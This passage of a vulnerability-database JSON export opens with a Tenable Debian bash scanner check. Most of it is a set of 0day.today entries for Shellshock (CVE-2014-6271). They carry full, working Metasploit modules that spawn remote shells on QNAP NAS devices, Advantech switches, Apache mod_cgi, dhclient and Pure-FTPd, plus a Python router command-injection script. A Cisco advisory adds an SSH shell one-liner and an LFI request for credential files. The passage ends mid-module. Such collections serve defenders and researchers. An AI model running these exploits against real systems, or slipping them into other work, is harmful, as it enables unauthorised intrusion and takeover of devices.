script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7\", prefix:\"bash\", reference:\"4.2+dfsg-0.1+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-11T05:17:54", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "1337DAY-ID-22692", "href": "https://0day.today/exploit/description/22692", "type": "zdt", "title": "Bash Environment Variables Code Injection Exploit", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22692"}, {"lastseen": "2018-04-09T01:48:10", "bulletinFamily": "exploit", "description": "Cisco Unified Communications Manager versions prior to 11.0.1, 10.5.2, and 9.2 suffer from multiple command execution vulnerabilities.", "modified": "2015-08-14T00:00:00", "published": "2015-08-14T00:00:00", "id": "1337DAY-ID-24039", "href": "https://0day.today/exploit/description/24039", "type": "zdt", "title": "Cisco 11.0.1 Unified Communications Manager Command Execution Vulnerability", "sourceData": "Title: Cisco Unified Communications Manager Multiple Vulnerabilities\r\nVendor: Cisco\r\nVendor URL: http://www.cisco.com/\r\nVersions affected: <9.2, <10.5.2, <11.0.1.\r\nSeverity: Low to medium\r\nVendor notified: Yes\r\nReported: Oct. 2014\r\nPublic release: Aug. 13th, 2015\r\nAuthor: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg>\r\n\r\nSummary:\r\n--------\r\n\r\nCisco Unified Communications Manager (CUCM) offers services such as session\r\nmanagement, voice, video, messaging, mobility, and web conferencing.\r\n\r\nDuring the last year, Vantage Point Security has reported four security\r\nissues to Cisco as listed below.\r\n\r\n\r\n1. Shellshock command injection\r\n--------------------------------\r\n\r\nAuthenticated users of CUCM can access limited functionality via the web\r\ninterface and Cisco console (SSH on port 22). Because the SSH server is\r\nconfigured to process several environment variables from the client and a\r\nvulnerable version of bash is used, it is possible to exploit command\r\ninjection via specially crafted environment variables (CVE-2014-6271 a.k.a.\r\nshellshock). This allows an attacker to spawn a shell running as the user\r\n\"admin\".\r\n\r\n\r\nSeveral environment variables can be used to exploit the issue. Example:\r\n\r\n\r\n$ LC_PAPER=\"() { x;};/bin/sh\" ssh [email\u00a0protected]\r\n\r\n\r\n2. Local File Inclusion\r\n-----------------------\r\n\r\nThe application allows users to view the contents of any locally accessible\r\nfiles on the web server through a vulnerability known as LFI (Local File\r\nInclusion). LFI vulnerabilities are commonly used to download application\r\nsource code, configuration files and files containing sensitive information\r\nsuch as passwords. Exploiting this issue requires a valid user account.\r\n\r\n\r\nhttps://cucm.example.com/:8443/reporter-servlet/GetFileContent?Location=/&FileName=/usr/local/thirdparty/jakarta-tomcat/conf/tomcat-users.xml\r\n\r\n\r\n3. Unauthenticated access to ping command\r\n-----------------------------------------\r\n\r\nThe pingExecute servlet allows unauthenticated users to execute pings to\r\narbitrary IP addresses. This could be used by an attacker to enumerate the\r\ninternal network. The following URL triggers a ping of the host 10.0.0.1:\r\n\r\nhttps://cucm.example.com:8443/cmplatform/pingExecute?hostname=10.0.0.1&interval=1.0&packetsize=12&count=1000&secure=false\r\n\r\n\r\n4. Magic session ID allows unauthenticated access to SOAP calls\r\n---------------------------------------------------------------\r\n\r\nAuthentication for some methods in the EPAS SOAP interface can be bypassed\r\nby using a hardcoded session ID. The methods \"GetUserLoginInfoHandler\" and\r\n\"GetLoggedinXMPPUserHandler\" are affected.\r\n\r\n\r\nFix Information:\r\n----------------\r\n\r\nUpgrade to CUCM version 9.2, 10.5.2 or 11.0.1.\r\n\r\n\r\nReferences:\r\n-----------\r\n\r\nhttps://tools.cisco.com/quickview/bug/CSCus88031\r\nhttps://tools.cisco.com/quickview/bug/CSCur49414\r\nhttps://tools.cisco.com/quickview/bug/CSCum05290\r\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\r\nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=37111\r\n\r\n\r\nTimeline:\r\n---------\r\n\r\n2014/10: Issues reported to Cisco;\r\n2015/07: Confirm that all issues have been fixed.\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24039"}, {"lastseen": "2018-01-03T01:00:50", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2015-03-27T00:00:00", "published": "2015-03-27T00:00:00", "id": "1337DAY-ID-23443", "href": "https://0day.today/exploit/description/23443", "type": "zdt", "title": "QNAP admin shell via Bash Environment Variable Code Injection Exploit", "sourceData": "# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection\r\n# Date: 7 February 2015\r\n# Exploit Author: Patrick Pellegrino | [email\u00a0protected] [work] / [email\u00a0protected] [other]\r\n# Employer homepage: http://www.securegroup.it\r\n# Vendor homepage: http://www.qnap.com\r\n# Version: All Turbo NAS models except TS-100, TS-101, TS-200\r\n# Tested on: TS-1279U-RP\r\n# CVE : 2014-6271\r\n# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61\r\n \r\n \r\n##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/d3vpp/metasploit-modules\r\n##\r\n \r\nrequire 'msf/core'\r\nrequire 'net/telnet'\r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Auxiliary::CommandShell\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection',\r\n 'Description' => %q{\r\n This module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection.\r\n Affected products:\r\n All Turbo NAS models except TS-100, TS-101, TS-200\r\n },\r\n 'Author' => ['Patrick Pellegrino'], # Metasploit module | [email\u00a0protected] [work] / [email\u00a0protected] [other]\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['CVE', '2014-6271'], #aka ShellShock\r\n ['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']\r\n ],\r\n 'Platform' => ['unix']\r\n ))\r\n \r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),\r\n OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993'])\r\n ], self.class)\r\n end\r\n \r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'agent' => \"() { :;}; echo; /usr/bin/id\"\r\n })\r\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE\r\n vprint_error(\"Connection failed\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n \r\n if !res\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code== 302 and res.body.include? 'uid'\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n \r\n \r\n def exploit_telnet()\r\n telnetport = datastore['LTELNET']\r\n \r\n print_status(\"#{rhost}:#{rport} - Telnet port used: #{telnetport}\")\r\n \r\n print_status(\"#{rhost}:#{rport} - Sending exploit\")\r\n begin\r\n sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })\r\n \r\n if sock\r\n print_good(\"#{rhost}:#{rport} - Backdoor service spawned\")\r\n add_socket(sock)\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Backdoor service not spawned\")\r\n end\r\n \r\n print_status \"Starting a Telnet session #{rhost}:#{telnetport}\"\r\n merge_me = {\r\n 'USERPASS_FILE' => nil,\r\n 'USER_FILE' => nil,\r\n 'PASS_FILE' => nil,\r\n 'USERNAME' => nil,\r\n 'PASSWORD' => nil\r\n }\r\n start_session(self, \"TELNET (#{rhost}:#{telnetport})\", merge_me, false, sock)\r\n rescue\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Backdoor service not handled\")\r\n end\r\n return\r\n end\r\n \r\n def run\r\n begin\r\n telnetport = datastore['LTELNET']\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'agent' => \"() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &\"\r\n }) \r\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\r\n Rex::HostUnreachable => e\r\n fail_with(Failure::Unreachable, e)\r\n ensure\r\n disconnect\r\n end\r\n exploit_telnet()\r\n \r\n end\r\n \r\nend\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23443"}, {"lastseen": "2018-04-13T09:42:40", "bulletinFamily": "exploit", "description": "This Metasploit module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This Metasploit module targets the 'ping.sh' CGI script, accessible through the Boa web server on Advantech switches. This Metasploit module was tested against firmware version 1322_D1.98.", "modified": "2015-12-02T00:00:00", "published": "2015-12-02T00:00:00", "id": "1337DAY-ID-24647", "href": "https://0day.today/exploit/description/24647", "type": "zdt", "title": "Advantech Switch Bash Environment Variable Code Injection Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)',\r\n 'Description' => %q{\r\n This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\r\n handles external environment variables. This module targets the 'ping.sh' CGI\r\n script, acessible through the Boa web server on Advantech switches. This module\r\n was tested against firmware version 1322_D1.98.\r\n },\r\n 'Author' => 'hdm',\r\n 'References' => [\r\n ['CVE', '2014-6271'],\r\n ['CWE', '94'],\r\n ['OSVDB', '112004'],\r\n ['EDB', '34765'],\r\n ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities'],\r\n ['URL', 'https://access.redhat.com/articles/1200223'],\r\n ['URL', 'http://seclists.org/oss-sec/2014/q3/649']\r\n ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => 'unix',\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\\x0A\\x0D\",\r\n 'DisableNops' => true,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'openssl generic'\r\n }\r\n },\r\n 'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],\r\n 'DefaultTarget' => 0,\r\n 'License' => MSF_LICENSE,\r\n 'DisclosureDate' => 'Dec 01 2015'\r\n ))\r\n register_options([\r\n Opt::RPORT(80)\r\n ], self.class)\r\n end\r\n\r\n #\r\n # CVE-2014-6271\r\n #\r\n def cve_2014_6271(cmd)\r\n %{() { :;}; $(#{cmd}) & }\r\n end\r\n\r\n #\r\n # Check credentials\r\n #\r\n def check\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => '/cgi-bin/ping.sh'\r\n )\r\n if !res\r\n vprint_error(\"#{peer} - No response from host\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.headers['Server'] =~ /Boa\\/(.*)/\r\n vprint_status(\"#{peer} - Found Boa version #{$1}\")\r\n else\r\n print_status(\"#{peer} - Target is not a Boa web server\")\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if res.body.to_s.index('127.0.0.1 ping statistics')\r\n return Exploit::CheckCode::Detected\r\n else\r\n vprint_error(\"#{peer} - Target does not appear to be an Advantech switch\")\r\n return Expoit::CheckCode::Safe\r\n end\r\n end\r\n\r\n #\r\n # Exploit\r\n #\r\n def exploit\r\n cmd = cve_2014_6271(payload.encoded)\r\n vprint_status(\"#{peer} - Trying to run command '#{cmd}'\")\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => '/cgi-bin/ping.sh',\r\n 'agent' => cmd\r\n )\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24647"}, {"lastseen": "2018-12-12T05:51:37", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2018-12-08T00:00:00", "published": "2018-12-08T00:00:00", "id": "1337DAY-ID-31749", "href": "https://0day.today/exploit/description/31749", "title": "FutureNet NXR-G240 Series ShellShock Command Injection Exploit", "type": "zdt", "sourceData": "# -*- coding: utf-8 -*-\r\n# Title: FutureNet NXR-G240 Series - \"ShellShock\" Remote Command Injection\r\n# Author: Nassim Asrir\r\n# You have a Q ? Contact me at: https://www.linkedin.com/in/nassim-asrir-b73a57122/\r\n# Vendor: http://www.centurysys.co.jp/\r\n# CVE: CVE-2014-6271\r\n# Greetz to : Nadia BENCHIKHA for the great help.\r\n# Example:\r\n# [[email\u00a0protected]]a[/home/sniperpex/Desktop]\r\n# #python ./exploit.py http://server -u admin -p admin -c ps\r\n\r\nimport urllib2\r\nimport base64\r\nimport bs4\r\nimport sys\r\nimport argparse\r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\n\r\nap = argparse.ArgumentParser(description=\"FutureNet NXR-G240 Series - ShellShock Remote Command Injection \")\r\n\r\nap.add_argument(\"host\", help=\"(Example: http://127.0.0.1).\")\r\n\r\nap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: admin)\")\r\n\r\nap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: admin)\")\r\n\r\nap.add_argument(\"-c\", \"--cmd\", help=\"Command to run.\")\r\n\r\nargs = ap.parse_args()\r\n\r\nrequest = urllib2.Request(args.host+\"/cgi-bin/information.cgi?section=arp&module=system&command=execute\")\r\n\r\nbase64string = base64.encodestring('%s:%s' % (args.user, args.password)).replace('\\n', '')\r\n\r\nprint '[+] Authentication & Exploit in progress...'\r\n\r\nrequest.add_header(\"Authorization\", \"Basic %s\" % base64string)\r\n\r\nrequest.add_header(\"User-Agent\", \"() { :;}; /bin/bash -c \"+str(args.cmd))\r\n\r\nresponse = urllib2.urlopen(request)\r\n\r\nsoup = bs4.BeautifulSoup(response, 'html.parser')\r\n\r\nfor textarea in soup.find_all('pre'):\r\n\r\n print textarea.get_text().replace(\"# ARPaea +-\",'').replace(\"e!\"c$?oaSSaa3/4aa\",'')\n\n# 0day.today [2018-12-12] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/31749"}, {"lastseen": "2018-03-14T14:36:41", "bulletinFamily": "exploit", "description": "When bash is started with an environment variable that begins with the string \"() {\", that variable is treated as a function definition and parsed as code. If extra commands are added after the function definition, they will be executed immediately. When dhclient receives an ACK that contains a domain name or hostname, they are passed to configuration scripts as environment variables, allowing us to trigger the bash bug. Because of the length restrictions and unusual networking scenario at time of exploitation, this Metasploit module achieves code execution by echoing our payload into /etc/crontab and cleans it up when we get a shell.", "modified": "2014-09-28T00:00:00", "published": "2014-09-28T00:00:00", "id": "1337DAY-ID-22703", "href": "https://0day.today/exploit/description/22703", "type": "zdt", "title": "Dhclient Bash Environment Variable Injection Exploit", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex/proto/dhcp'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::DHCPServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Dhclient Bash Environment Variable Injection',\r\n 'Description' => %q|\r\n When bash is started with an environment variable that begins with the\r\n string \"() {\", that variable is treated as a function definition and\r\n parsed as code. If extra commands are added after the function\r\n definition, they will be executed immediately. When dhclient receives\r\n an ACK that contains a domain name or hostname, they are passed to\r\n configuration scripts as environment variables, allowing us to trigger\r\n the bash bug.\r\n\r\n Because of the length restrictions and unusual networking scenario at\r\n time of exploitation, we achieve code execution by echoing our payload\r\n into /etc/crontab and clean it up when we get a shell.\r\n |,\r\n 'Author' =>\r\n [\r\n 'Stephane Chazelas', # Vulnerability discovery\r\n 'egypt' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-6271']\r\n ],\r\n 'Payload' =>\r\n {\r\n # 255 for a domain name, minus some room for encoding\r\n 'Space' => 200,\r\n 'DisableNops' => true,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic bash telnet ruby',\r\n }\r\n },\r\n 'Targets' => [ [ 'Automatic Target', { }] ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 24 2014'\r\n ))\r\n\r\n deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')\r\n end\r\n\r\n def on_new_session(session)\r\n print_status \"Cleaning up crontab\"\r\n # XXX this will brick a server some day\r\n session.shell_command_token(\"sed -i '/^\\\\* \\\\* \\\\* \\\\* \\\\* root/d' /etc/crontab\")\r\n end\r\n\r\n def exploit\r\n hash = datastore.copy\r\n # Quotes seem to be completely stripped, so other characters have to be\r\n # escaped\r\n p = payload.encoded.gsub(/([<>()|'&;$])/) { |s| Rex::Text.to_hex(s) }\r\n echo = \"echo -e #{(Rex::Text.to_hex(\"*\") + \" \") * 5}root #{p}>>/etc/crontab\"\r\n hash['DOMAINNAME'] = \"() { :; };#{echo}\"\r\n if hash['DOMAINNAME'].length > 255\r\n raise ArgumentError, 'payload too long'\r\n end\r\n\r\n hash['HOSTNAME'] = \"() { :; };#{echo}\"\r\n hash['URL'] = \"() { :; };#{echo}\"\r\n start_service(hash)\r\n\r\n begin\r\n while @dhcp.thread.alive?\r\n sleep 2\r\n end\r\n ensure\r\n stop_service\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22703"}, {"lastseen": "2018-01-02T03:07:54", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a code injection in specially crafted environment variables in Bash, specifically targeting Apache mod_cgi scripts through the HTTP_USER_AGENT variable.", "modified": "2014-09-26T00:00:00", "published": "2014-09-26T00:00:00", "id": "1337DAY-ID-22701", "href": "https://0day.today/exploit/description/22701", "type": "zdt", "title": "Apache mod_cgi Bash Environment Variable Code Injection Exploit", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',\r\n 'Description' => %q{\r\n This module exploits a code injection in specially crafted environment\r\n variables in Bash, specifically targeting Apache mod_cgi scripts through\r\n the HTTP_USER_AGENT variable.\r\n },\r\n 'Author' => [\r\n 'Stephane Chazelas', # Vulnerability discovery\r\n 'wvu', # Original Metasploit aux module\r\n 'juan vazquez' # Allow wvu's module to get native sessions\r\n ],\r\n 'References' => [\r\n ['CVE', '2014-6271'],\r\n ['URL', 'https://access.redhat.com/articles/1200223'],\r\n ['URL', 'http://seclists.org/oss-sec/2014/q3/649']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'Space' => 2048\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Linux x86',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'CmdStagerFlavor' => [ :echo, :printf ]\r\n }\r\n ],\r\n [ 'Linux x86_64',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86_64,\r\n 'CmdStagerFlavor' => [ :echo, :printf ]\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 24 2014',\r\n 'License' => MSF_LICENSE\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to CGI script']),\r\n OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),\r\n OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),\r\n OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),\r\n OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = req(\"echo #{marker}\")\r\n\r\n if res && res.body.include?(marker * 3)\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n # Cannot use generic/shell_reverse_tcp inside an elf\r\n # Checking before proceeds\r\n if generate_payload_exe.blank?\r\n fail_with(Failure::BadConfig, \"#{peer} - Failed to store payload inside executable, please select a native payload\")\r\n end\r\n\r\n execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)\r\n\r\n # A last chance after the cmdstager\r\n # Trying to make it generic\r\n unless session_created?\r\n req(\"#{stager_instance.instance_variable_get(\"@tempdir\")}#{stager_instance.instance_variable_get(\"@var_elf\")}\")\r\n end\r\n end\r\n\r\n def execute_command(cmd, opts)\r\n cmd.gsub!('chmod', \"#{datastore['RPATH']}/chmod\")\r\n\r\n req(cmd)\r\n end\r\n\r\n def req(cmd)\r\n send_request_cgi(\r\n {\r\n 'method' => datastore['METHOD'],\r\n 'uri' => normalize_uri(target_uri.path.to_s),\r\n 'agent' => \"() { :;};echo #{marker}$(#{cmd})#{marker}\"\r\n }, datastore['TIMEOUT'])\r\n end\r\n\r\n def marker\r\n @marker ||= rand_text_alphanumeric(rand(42) + 1)\r\n end\r\nend\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22701"}, {"lastseen": "2018-04-14T17:47:03", "bulletinFamily": "exploit", "description": "Gnu Bash versions 4.3 and below remote command injection exploit that leverages the User-Agent header via vulnerable CGI scripts.", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "1337DAY-ID-22691", "href": "https://0day.today/exploit/description/22691", "type": "zdt", "title": "GNU bash Environment Variable Command Injection Vulnerability", "sourceData": "The following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\r\n \r\nLike \u201creal\u201d programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like:\r\n \r\n$ env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"\r\n vulnerable\r\n this is a test\r\n \r\nThe patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:\r\n \r\n $ env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"\r\n bash: warning: x: ignoring function definition attempt\r\n bash: error importing function definition for `x'\r\n this is a test\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22691"}, {"lastseen": "2018-03-09T23:24:19", "bulletinFamily": "exploit", "description": "This Metasploit module exploits the code injection flaw known as shellshock which leverages specially crafted environment variables in Bash. This exploit specifically targets Pure-FTPd when configured to use an external program for authentication.", "modified": "2014-10-02T00:00:00", "published": "2014-10-02T00:00:00", "id": "1337DAY-ID-22713", "href": "https://0day.today/exploit/description/22713", "type": "zdt", "title": "Pure-FTPd External Authentication Bash Environment Variable Code Injection Exploit", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::Ftp\r\n include Msf::Exploit::CmdStager\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',\r\n 'Description' => %q(\r\n This module exploits the code injection flaw known as shellshock which\r\n leverages specially crafted environment variables in Bash. This exploit\r\n specifically targets Pure-FTPd when configured to use an external\r\n program for authentication.\r\n ),\r\n 'Author' =>\r\n [\r\n 'Stephane Chazelas', # Vulnerability discovery\r\n 'Frank Denis', # Discovery of Pure-FTPd attack vector\r\n 'Spencer McIntyre' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-6271'],\r\n ['OSVDB', '112004'],\r\n ['EDB', '34765'],\r\n ['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'Space' => 2048\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Linux x86',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'CmdStagerFlavor' => :printf\r\n }\r\n ],\r\n [ 'Linux x86_64',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86_64,\r\n 'CmdStagerFlavor' => :printf\r\n }\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependFork' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 24 2014'))\r\n register_options(\r\n [\r\n Opt::RPORT(21),\r\n OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])\r\n ], self.class)\r\n deregister_options('FTPUSER', 'FTPPASS')\r\n end\r\n \r\n def check\r\n # this check method tries to use the vulnerability to bypass the login\r\n username = rand_text_alphanumeric(rand(20) + 1)\r\n random_id = (rand(100) + 1)\r\n command = \"echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end\"\r\n if send_command(username, command) =~ /^2\\d\\d ok./i\r\n return CheckCode::Safe if banner !~ /pure-ftpd/i\r\n disconnect\r\n \r\n command = \"echo auth_ok:0; echo end\"\r\n if send_command(username, command) =~ /^5\\d\\d login authentication failed/i\r\n return CheckCode::Vulnerable\r\n end\r\n end\r\n disconnect\r\n \r\n CheckCode::Safe\r\n end\r\n \r\n def execute_command(cmd, _opts)\r\n cmd.gsub!('chmod', \"#{datastore['RPATH']}/chmod\")\r\n username = rand_text_alphanumeric(rand(20) + 1)\r\n send_command(username, cmd)\r\n end\r\n \r\n def exploit\r\n # Cannot use generic/shell_reverse_tcp inside an elf\r\n # Checking before proceeds\r\n if generate_payload_exe.blank?\r\n fail_with(Failure::BadConfig, \"#{peer} - Failed to store payload inside executable, please select a native payload\")\r\n end\r\n \r\n execute_cmdstager(linemax: 500)\r\n handler\r\n 